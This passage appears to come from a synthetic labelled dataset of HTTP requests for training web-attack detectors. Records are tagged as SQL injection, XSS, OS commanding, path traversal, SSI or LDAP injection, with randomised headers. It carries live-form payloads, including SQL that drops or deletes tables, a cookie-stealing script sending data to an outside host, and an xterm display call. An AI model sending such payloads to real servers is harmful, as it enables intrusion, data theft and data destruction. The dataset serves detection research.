Referer: http://noFwo.cz/tnto7wsi/tipt.php3
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/7.7 (X11; U; Linux i586 0.6; nf-st; rv:5.8.4) Gecko/31505657
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 5n36a/5.4 183.119.213.129, 3.9 146.67.78.34
Transfer-Encoding: gzip
Upgrade: omsS/1.9, atcm2/9.8, htuh6/0.3, roto/0.9, ttttRe/7.7
Warning: 211 5.85.253.98 "saoadsette" 
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38049
Start - Id: 43286
class: OsCommanding
GET /5FUJPl4IcU_i@p/Eltsnoq050uacnaqd/woSD6.php3?rtiSLieltidt=%250A+++xterm+-display+++++www.niniti.com%3A0.0 HTTP/1.0
Host: 133.211.20.134
Connection: close
Accept: application/zip, text/*, video/quicktime;q=0.3
Accept-Charset: ks_c_5601-1987, koi8;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 41.151.127.122
Cookie: adstaij5ov=2122835;r5tEeuxphq2=7;49rmelat=11742413
Cookie2: $Version="1"
Date: Sun, 24 Sep 06 07:20:35 UTC
ETag: W/"9LxvEG1xl9f1meqjQ5m"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Wed, 29 Apr 09 24:35:56 CET
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 12
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: /1hyttntp/wergaz/EehT/avbN/edhf.css
TE: chunked
Trailer: If-Match
User-Agent: ttolsHh (uOtIn@-)
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/0.2 101.232.26.216
Transfer-Encoding: deflate
Upgrade: uilasL/5.5, ihdnH/4.2
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 75919
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43286
Start - Id: 47003
class: XSS
GET /tt/ndns2naa/sNnUw/5asalesyut/9efnlgax7nnc0sf/neq7axeeaeltirh6yqat/1ll0uietE/cqj7e4mppEnaW6roWvb.bin?mhear3seow=%3Ciframe++++src++%3D+++%22++++vbscript%3A%5Balert++%28%27eeaoarr%27%29%3B%5D++%22+%3E&hayivoti=httpht%7Cxxlikesfn-&tg33ltetp=3&cMFxeFCK=2%3Buoand+Acmde%3DeO HTTP/1.1
Host: www.lt7aWSa25.com
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.2
Accept-Encoding: 
Accept-Language: 1lz-so;q=0.6, 2a6oogo-r
Cache-Control: only-if-cached
Client-ip: 0.51.121.220
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="757"
Date: Wed, 04 Jan 06 19:55:37 UTC
ETag: "o8HdQMwRnEl_XlX"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Thu, 26 Aug 04 21:11:59 UTC
If-Unmodified-Since: Sat, 12 Nov 05 12:12:55 CET
If-Match: *
If-None-Match: "FdOH1T9pSY3.jMVK0r"
If-Range: Thu, 15 Mar 07 12:07:43 UTC
Max-Forwards: 48
MIME-Version: 0.5
Pragma: knN9mase=is
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: NTLM c2VtbWNSZWV1cHJqZWF0dWRlaE1lNm1yYzNsTmlhY2VuMUFsYm9paA==
Range: 5-22964
Referer: http://www.immanihe.it/saald/2qqmuen4/02EeesDe/Tltobdtn/boId.asp
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 2.3; hj-a9; rv:5.3.4) Gecko/05790193
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 347x3393
Via: 3.7 www.el4deu.css
Transfer-Encoding: identity
Upgrade: l9oe/6.6, lEdpas/0.5, d78nsb/8.9
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 09560109
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47003
Start - Id: 42413
class: SqlInjection
GET /reQ2z0hvc7NR4L9.js?srBoekuitlm=wae&atit42eet5p=stallsi%3C&d8z2oe=gusooaaonuex&eosdo9itE=tidh&rpef=eKDmTpY9_FAw&1NnRmIaeoeah3fi=ssn&DeeuehC=%27%3B+++++drop++table+admin&iOfcdsh6ateTmo=2eE7e9fhoi&PC_tq5B3=41770&wes89=wzoe&nmihtn9nmipn=5060654&A9dRbr=816601447&2kata=ffrconnect&0nsYpbaoc8=3%27Te&Ehiwmeseo=0 HTTP/1.1
Host: 107.188.109.45
Connection: close
Accept: */*
Accept-Charset: iso-8859-8;q=0.9, gb2312, x-mac-roman;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="0"
Date: Sun, 01 Jun 08 20:39:07 CET
ETag: "r8I_iDY0uWEfoKfD"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Sun, 29 Aug 04 03:43:16 GMT
If-Match: *
If-None-Match: "y9VxiDxue08q4.M8@hJ"
If-Range: *
Max-Forwards: 7
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: -975727,63980-89,80-3
Referer: http://www.eomeear.st/n1lfe/qamt.nsf
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.4 (Windows; U; WinNT 3.8; eh-aT; rv:3.0.2) Gecko/25653146
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: 5.6 www.b2o1.htm, FTP/5.6 www.3ej7.html
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 132 103.251.31.233 "a5neo" "Tue, 16 Dec 08 15:42:51 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42413
Start - Id: 44965
class: PathTransversal
GET /dW08iT-i/nAetcbDUMVw0c-./ha5S-/3rMd5T1xI_xTBU4yr/9v.W6wX.php3?dazada=634&eeerMs3r=collection%28+file%3A%2F%2F%2Fc%3A%2Fiqieh%2Fmtet1y.xml+%29&ebuuT=oz HTTP/1.0
Host: www.elaAtsemL.it:6
Connection: a6r9iiea
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 141.6.207.75
Cookie: btz=998;ri29itqihAelex=723979;eo=9;Nhr0doaddeseokn=8selreeesetssc
Cookie2: $Version="7"
Date: Mon, 01 Sep 08 22:02:22 UTC
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Sun, 15 Jan 06 10:48:12 UTC
If-Unmodified-Since: Sun, 19 Nov 06 21:36:30 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Jul 08 15:39:37 CET
Max-Forwards: 8526
MIME-Version: 0.8
Pragma: l4hrjfnb=he
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: -972278
Referer: http://www.s6etj.st/aufhT/xl5ai/ruiae/mifoe/5royct.mdb
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.4 (Windows; U; WinNT 0.6; ms-ul; rv:5.4.7) Gecko/91790578
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 298x3014
Via: 1.0 16.3.246.115, FTP/1.4 www.muc4tsEs.htm
Transfer-Encoding: kr9a
Upgrade: mAelaA/3.4, 5lote/9.4, GsasM/7.6, ho40u/4.6, tead/1.7
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44965
Start - Id: 46903
class: XSS
POST /i1pE4/SepASbry0tcSgRis/e1ShHM7Gd.MqZPlg/eEY2hKPwS9FvNUJr/6tzntt5g7huesototh/GKstdinKdkl-7/CTxvk.png? HTTP/1.1
Content-Length: 318
Content-Language: ehn6jn,iiidm
Content-Encoding: identity
Content-Location: http://gFhnfEiI.biz/U6e6.jsp
Content-MD5: bjB0aXdpZHlzMWhiNnVBbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 01:58:40 CET
Last-Modified: Thu, 24 Jun 04 23:45:32 CET
Host: www.15docYhasc.biz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: rnT2nta0-U;q=0.5, nrm22s1-tcssnoue;q=0.3, jHzu-weOs;q=0.0
Cache-Control: min-fresh=2
Client-ip: 44.189.197.231
Cookie: aelibep=93459;an=nedaed7edftxm/l;QOhttpsIDNY=rNtRx.iDOi
Cookie2: $Version="07"
Date: Wed, 21 Jan 09 10:56:04 UTC
ETag: "t@UnAXUQXOo_-9kX"
Expect: rezd8=ae1nY;5le1igo=1iciVsnl
From: nbfea3@yM2KA0.biz
If-Modified-Since: Sun, 29 Aug 04 18:31:05 CET
If-Unmodified-Since: Wed, 23 May 07 21:17:04 GMT
If-Match: "Om3rCXI.9uHVp@7q"
If-None-Match: *
If-Range: Sat, 16 Oct 04 04:44:41 CET
Max-Forwards: 2387
MIME-Version: 9.1
Pragma: Rolclshy=Be0EC
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest opaque="ntdla"
Range: -790
Referer: /gtnt.htm
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 0.0; wn-lf; rv:1.1.9) Gecko/28168675
UA-CPU: MIPS
UA-Disp: 802,874,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8473x700
Via: rinlex/7.4 115.255.202.36
Transfer-Encoding: identity
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

yfhstn=32808971&4iqutw=tUgnh&0h=22611&MAgKiN7=himfajtxbnynfe6o&RDdperlandTq=tY9_aH6eKA&oetgykuauu1m=<div  style="binding:    url([http://www.in.com/script/ndsbtfut.asp]); " >&eoddnomirthhlyl=6SD9UxB3j&sldaretI3=eerho&ceo=nenolrib&rOrD=esho&ueitlteI=cTnF04gCZedx&cs84raHEahtIQte=nxN.4uh5

End - Id: 46903
Start - Id: 48028
class: XSS
GET /wlw0hnua/dy0ehqnx/ohtmeeiiy.asmx?8Thii0m=enohguftAgwongsuys&To=sooe&7Mledfntet9I=aydaup0xw&erD=%3Cinput+type+%3D%22+image+++++%22+dynsrc%3D+%22+javascript%3A+%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ri.com%2Fcgi-bin%2Fonllchleti.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E&hepfrwiOhm7eab=rw8Lv&kHkVscriptpassthruupdatelQMN=8794169455&sr0fuia=o4RrvcTwH&rnqniiy=62&Aosriolaewssua=lr&fNi9bor=tbwobgsounds&spabatdrwstoe=systema5&okaxsrEEeiSaA=%7CCmddoHi HTTP/1.0
Host: www.eibedhant.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950, windows-1258;q=0.5, us-ascii;q=0.1, iso-8859-2, us-ascii
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 187.82.70.221
Cookie: 42hs79=iesgroup byanurlhome;nTmehwIjoe3qi=svN7Gd;rp=22385;gles=neq)servicess5accept=bts l6r;eocro=@ia-atelnetuewp-qgenHe;uo=s8j
Cookie2: $Version="114"
Date: Fri, 17 Feb 06 16:04:28 GMT
ETag: W/"Z03a@HNkPazFYlhD_E."
Expect: npRl7Nrr
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 13 Oct 07 06:38:52 UTC
If-Unmodified-Since: Mon, 10 Nov 08 20:07:22 UTC
If-Match: *
If-None-Match: "rKtUV-y03H5wic6G3M8W"
If-Range: Sat, 24 May 08 17:20:03 GMT
Max-Forwards: 5061
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM b2NpZWRtaHRvc090d2Vld282bXRobnNrcmR0ZXR0UmQ1aWFzc3Q=
Authorization: Digest response="FAEfCADf616eD0Ba8AC58b324117Dcc8"
Range: 3837-2
Referer: http://usny7t.gov/msc76/Ssefdrg/e9Ef/rai5le.mp3
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (Windows; U; WinNT 5.5; ee-ue; rv:0.4.7) Gecko/76201438
UA-CPU: PowerPC
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: o2n/5.7 www.GBIru.js, 9.8 27.225.238.213
Transfer-Encoding: compress
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48028
Start - Id: 42491
class: SqlInjection
GET /ntssegkrsseiar/eFoUk2VXXnD8RXiXD/ieClelltarrfeeL/f-W_5SotVpU@KS/EO/m@bdj2WZWLDG8MA3urr/Isecubaceiehcie.sh?mioae8=oiTi&chasdnoksdrf=AND+++++ascii%28lower%28substring%28%28SELECT+TOP+++++1++++onni+FROM++sysobject+WHERE++xtype+++++%3D+++++%27U%27+++%29%2C1%2C1%29%29%29+++++%3E++++111&ptswmufhngob=metalautI%3Am6%5Benpcmdmn HTTP/1.1
Host: www.uetefi3bk.be
Connection: evSoll
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=11
Client-ip: 215.176.56.170
Cookie: mtermtcairtfyHp=egKoae]y;tenEtapu=ah;nf5lhy=6015892;ygaYedafrnoetc=r8MuKzqIe9;RcY3KO=h
Cookie2: $Version="2"
Date: Fri, 26 Nov 04 24:03:11 CET
ETag: W/"5YJ9gTlr.4GpRna"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Tue, 12 Sep 06 23:14:11 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 148
MIME-Version: 8.5
Pragma: em=eqCs
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: Basic NWJjcjBMOnNpeW51Yg==
Range: 7-59040
Referer: http://www.xtg0nerd.be/msa8e/9shar/ecopxd/9r4i/aage.tar
TE: trailers,chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: dntf9jl (t@-7L3K3z; oc2-sF; lKdj@B3; oZ-33Ds)
UA-CPU: x86
UA-Disp: 6364,160,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 4.3 70.53.26.31, 1.6 www.mya0re.png, HTTP/1.6 www.dapohr6t.jpg
Transfer-Encoding: gzip
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42491
Start - Id: 46500
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.0
Host: www.so1e.net:80
Connection: close
Accept: image/*, text/*;q=0.1
Accept-Charset: utf-7;q=0.8, big5, x-mac-greek, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 219.134.80.54
Cookie: u8nNria0srtowa=7rl5@
Cookie2: $Version="88"
Date: Mon, 09 Nov 09 01:32:53 CET
ETag: W/"4Q2Q8kPVSy5KUOAmh"
Expect: ninwdknn
From: piteR@trksge.gov
If-Modified-Since: Thu, 26 Oct 06 04:35:25 GMT
If-Unmodified-Since: Tue, 23 Sep 08 18:30:23 CET
If-Match: *
If-None-Match: *
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 922
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic aXp4czE6c2xhag==
Range: 8-112855,2026-165541
Referer: /eltkta/ndhgate/qedro9r7.asmx
TE: trailers,trailers
Trailer: Date
User-Agent: 8eTeJi.Je http://www.5toi9hs.uk
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/9.6 www.9wrn.css, opoth/0.8 77.181.138.141, FTP/9.5 www.adh2h.css
Transfer-Encoding: identity
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46500
Start - Id: 40789
class: SSI
GET /i6/whavingpasswdiVQKxDo-a@8r.shtml?G9deleteMBR=1tcwaeeeme&qIeehFz=2q9dhl%7Cy5rsouaL%3Cxmlar&lh3=nhXE&naon5Q=%3C%21--+++%23odbc++++statement+++%3D%22select+++++onstwegy%2C++++ndsLtg%2C++reh2++from+++++t3hueor+++order+by++++4%2C++++433%2C+++8%22++--%3E&AiVHPPV=qm&Lepca=593853 HTTP/1.1
Host: 24.198.69.64
Connection: rd9prg
Accept: application/*, application/rtf
Accept-Charset: windows-1252, x-mac-arabic
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=2
Client-ip: 79.174.208.245
Cookie: TGPFbmetai=ocwxitn4onse133lq;Pxesoe8nIlnnE=sEr4@T_txDr;andcWenzdljj=(;tnlsdaq0TlhHjsn=01;qLwY3tc=99;fisS9=6444906
Cookie2: $Version="363"
Date: Thu, 14 Jan 10 08:18:08 UTC
ETag: W/"W9T0XsxJpfJzhTByMX"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iipxpA@IasrDjh.ch
If-Modified-Since: Tue, 19 Apr 05 05:59:54 GMT
If-Unmodified-Since: Fri, 30 May 08 15:26:43 GMT
If-Match: "V04sxmqFmdOGDxz6"
If-None-Match: *
If-Range: *
Max-Forwards: 3980
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM T3Zob2lzcW5lcmxidmVubnNpcmYzZGVmdGNyM3Vod2xvdGJs
Authorization: Gb9a uOywAra=bOuweTbi
Range: 6294-616374
Referer: /4enebvid/Ratd/iermTlnd.jsp
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: mwnern/6.2.6.8
UA-Disp: 4103,847,16
UA-OS: Win98
UA-Pixels: 4833x5333
Via: HTTP/8.5 101.28.60.155, FTP/6.3 www.ntem8p.tiff
Transfer-Encoding: compress
Upgrade: hfheyu/3.0, aae/3.8, rsayt/5.1, moh1r/4.2, ryonhi/6.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40789
Start - Id: 42081
class: SqlInjection
GET /aeoa/v6rdD-tmpnull/tqFg/bked9@mP.css?ci4t4s=ei&@bzaRpJ6=e72d&chnt=604983&e2s=hk&scfkb4nntesBnao=dton8oa&ndnihddbuMn0a=ta&t6ltioe3fe=15roBkdnph-e&lz9=73875&etaooree=etgust5eeediitn&vsenunoiedaCa=hoocscript+et%3Fl%26tta%7E+&5it=OR++++%27i7g%27+++%3D+%27Sim%27%2B%27ple%27&lTgkCWn0a9L=srmeed+&pe4aitmHlsy=be HTTP/1.1
Host: 94.153.195.220
Connection: keep-alive
Accept: audio/x-wav;q=0.5, video/*
Accept-Charset: x-mac-greek;q=0.9, windows-1254;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 234.253.45.250
Cookie: gnelmclltsnRc=538;eehoaaEnzenlida=643439;mstwneenao0e=esS
Cookie2: $Version="7"
Date: Sun, 29 Apr 07 19:15:26 GMT
ETag: "SQ-tIM.HVaLNvisl3sL"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Sat, 31 Mar 07 20:51:50 GMT
If-Unmodified-Since: Tue, 28 Nov 06 14:32:11 CET
If-Match: *
If-None-Match: "09z3NyWNnJAYmcIw"
If-Range: "j5NgLq@Hkg6pmA8URlL"
Max-Forwards: 0
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: tczen owIa=t6tjeTgW
Authorization: NTLM bG9jb3NhcElwZWFzeGNvNXRpcmZuaWh0U2phYXJyNmE=
Range: -951
Referer: http://9oya.biz/moeascwu/o1Aebd/eaopta.swf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 2.1; nr-0g; rv:2.0.1) Gecko/12964813
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 861x9768
Via: HTTP/8.0 179.46.94.57
Transfer-Encoding: deflate
Upgrade: uose/3.2, vzaeDe/0.5, 0rrE/2.7, gnnk/0.3, seow/3.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42081
Start - Id: 37366
class: LdapInjection
GET /c19toin/no/uAModBxOVNJ4m/E6oxpassthruyR@/hem/ocX2gelQ7tkd/o1iDY3@jy1eS/e@xk.asp?SEs4T=889972&miwu7uev=1557469&hite=90&ienaacepirqecR=0&tsiEosi=880241&XQJphprBlib=N1ie5tr&ageldamM=7340014&fjik9c=RNi&E9T=7091532&crsipqc=p%5Cfe&xbsXm=3rahhfrom+beazs&shlKesap=3kuL-VIDs0E HTTP/1.0
Host: 66.177.173.92
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 117.148.34.106
Cookie: eb9n=glpriiQwnDaphrel;Eotssin=vniLz6xX;qK9htpassKT=6639434;fy9ne=Titir
Cookie2: $Version="95"
Date: Sat, 01 Aug 09 22:02:01 GMT
ETag: "nH@p4kgBu5KKDz@rCf"
Expect: rcsr=dsiiqei
From: zhwiybw@hehuAUa89a.fr
If-Modified-Since: Thu, 21 Apr 05 06:29:42 GMT
If-Unmodified-Since: Tue, 06 Sep 05 12:26:10 GMT
If-Match: "rTnh9CliQ9M6s_c9PMEC"
If-None-Match: *
If-Range: Mon, 22 Oct 07 03:12:31 GMT
Max-Forwards: 195
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM d29uRWVtWXM5bzNyYW1obHphOXR1b2h0aHBOY2xub2VkY1Rm
Authorization: NTLM YkI0TmV0c2ZtYWVwa2VFb3VhYTlhYm9laWVOZWdsb2U=
Range: 40465-,-86,-83463
Referer: http://www.Mn3uycaa.ch/hvrfn.exe
TE: trailers,deflate,gzip;q=0.9
Trailer: If-Range
User-Agent: io8)(|  (pzif=*)
UA-CPU: PowerPC
UA-Disp: 929,760,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1711x6718
Via: 2.4 212.155.205.206, f9iGi/4.4 74.3.89.194
Transfer-Encoding: emee
Upgrade: oie/1.4, esndns/6.8, eengr0/5.0, e7la1/2.5
Warning: 670 195.185.136.48 "lepotnTerel" 
X-Forwarded-For: 183.74.149.62
X-Serial-Number: 30089699
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37366
Start - Id: 41661
class: SqlInjection
GET /Y8J.sBO7lL3acceptYR/suKSstaBbKwNJb6i.js?kcr2ulehs=%27+++%29%3B++delete+from+++users%3B+++++commit%3B+++dummy%28++++%27&Aalyie=589265&uasmoS=ydg1&0deA=d2x HTTP/1.1
Host: www.Eaw6edfeh.fr
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw;q=0.2, iso-8859-5;q=0.5, x-mac-arabic;q=0.7, iso-8859-15;q=0.0, x-mac-ce
Accept-Encoding: *;q=0.3
Accept-Language: 4ihaloiT-alRsati;q=0.6, rwoIak-T6il;q=0.2
Cache-Control: min-fresh=7
Client-ip: 239.57.78.114
Cookie: dns=5769863
Cookie2: $Version="28"
Date: Sat, 08 Sep 07 03:28:32 UTC
ETag: W/"Jwls9@JFCFiY39i"
Expect: tdqm
From: oseas@soacs.biz
If-Modified-Since: Thu, 01 Sep 05 03:55:24 CET
If-Unmodified-Since: Mon, 25 Jan 10 02:49:43 UTC
If-Match: "YyFVpGZ8f9kz2PrDZ-Z0"
If-None-Match: "ZrEIaWe6QQnjlnf6iTt"
If-Range: Thu, 06 Sep 07 07:35:32 GMT
Max-Forwards: 6348
MIME-Version: 3.1
Pragma: aioRruoR=2ost
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: Basic dnd0cW56OnRzZGxjYThh
Range: 8646-84,-596087,4-03835
Referer: /soyor/tr8mthn/oeUwtGs/aNira.exe
TE: trailers,deflate;q=0.7
Trailer: If-Range
User-Agent: elMXFdAyU http://www.coeonir.biz
UA-CPU: MIPS
UA-Disp: 4417,837,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 4.7 www.mref.jpeg, 6.5 www.rlnm.css
Transfer-Encoding: compress
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41661
Start - Id: 45829
class: PathTransversal
GET /vbscriptqVnull8AExNFokxtermWh/Wjgon/-0F1he.pFnK/2UBoptkxwhere/MinNsdjent0eotid/tsEU2amtton/w465a/oauIYmPKlFOcaVgiIz.pl?wn5iliTmue=075315&oJLyRcMy=a+&uoO=sam&includecmrinsert0-5i5positionO=%5CWINDOWS%5Csystem.ini&E4h2supt0eeeelw=e25mn&8sltnosph=%285be69Nlugsock_streamote&wuatt=7naahgdformIardh&saZfmoilsq=s42_WzI_&xenabsiehtmd3oi=euia4n7y&7er8rT=e3kdtmwNJ&otekhdyn=92892&A7hie=nNafxobinn+ HTTP/1.1
Host: 251.94.234.47:322
Connection: keep-alive
Accept: video/quicktime;q=0.8
Accept-Charset: iso-8859-3;q=0.0, windows-1254;q=0.1, macintosh, windows-1258, windows-1258
Accept-Encoding: 
Accept-Language: abpexsn9-wdc, xqlnnauR-0qS12ros, acqxnrg-Hlp;q=0.8
Cache-Control: min-fresh=73
Client-ip: 106.190.4.232
Cookie: ydfromfnlr=mZIfC.;krt3=E;F-cmdDnph-5elnJPl=L1derh<nbaios3d;adi=iastodsagh;aig=x3ZgD;ugvexecHUgl=geoeatl
Cookie2: $Version="38"
Date: Mon, 02 Jun 08 13:45:48 CET
ETag: W/"0Tmw.hj-HlQDAFpQyyGj"
Expect: tons32
From: rddi93@reet.net
If-Modified-Since: Sun, 28 May 06 20:36:37 UTC
If-Unmodified-Since: Sat, 26 May 07 01:41:56 GMT
If-Match: *
If-None-Match: "8Lnsjt0ctOCClpc9T"
If-Range: *
Max-Forwards: 6211
MIME-Version: 9.7
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: NTLM czR1Z2V0dG9nbmVveXJhZWxzaHJhc2NSNHVjbTFydHN0dXRPdXB3ZXd0
Range: 09236-
Referer: http://www.Cle4Etl.gov/TA8sagr/mwateetq.pdf
TE: chunked,deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.9 (Machintosh; U; PPC Mac OS X 5.6; tA-te; rv:5.3.5) Gecko/84691429
UA-Color: color8
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
